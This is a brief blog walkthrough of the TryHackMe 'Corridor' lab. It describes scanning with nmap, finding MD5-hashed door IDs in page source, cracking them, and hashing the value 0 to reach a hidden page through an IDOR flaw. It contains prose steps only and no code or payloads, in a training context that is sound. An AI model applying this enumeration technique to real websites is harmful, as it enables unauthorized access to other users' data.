IDOR Vulnerability

In this blog:

• NMAP.

• Inspecting page source.

• Hash-identifier.

• Crackstation.net and Cyberchef.

• Link to the room at the end.

Running NMAP

Starting the attackbox, we can start an nmap scan with the supplied IP address which shows that the http service on port 80 is open.

Inspecting page source

When accessing the website, all we see is a generic website with an image.

Clicking CTRL+U (or right click + view page source) takes us to this page which shows some hash values seemingly pointing to each of the doors.

Hash-identifier

I will be opening up my kali Linux machine in virtual box to try and test the hashed values to identify the hash algorithm so I can find out what value (if any) the hashed strings are referring to in the Query component of the URL.

Trying one of the strings shows us that it is in fact an MD5 hash.

Crackstation.net and Cyberchef

Trying one of the strings in crackstation.net, we get that they are referring to certain values that are given to each door. The value for this door is 2.

We can use CyberChef to input custom values and output an MD5 hash that we can inject into the query and find the flag.

Typing 2 into the input gives us the same hash as the one we see in crackstation.net.

So trying the number 0 we get this hash.

Putting the string in crackstation.net confirms that the value is 0.

Copying this into the Query after the IP address in the URL, retrieves us our flag.

Try the Room yourself here:

➡️ https://tryhackme.com/room/corridor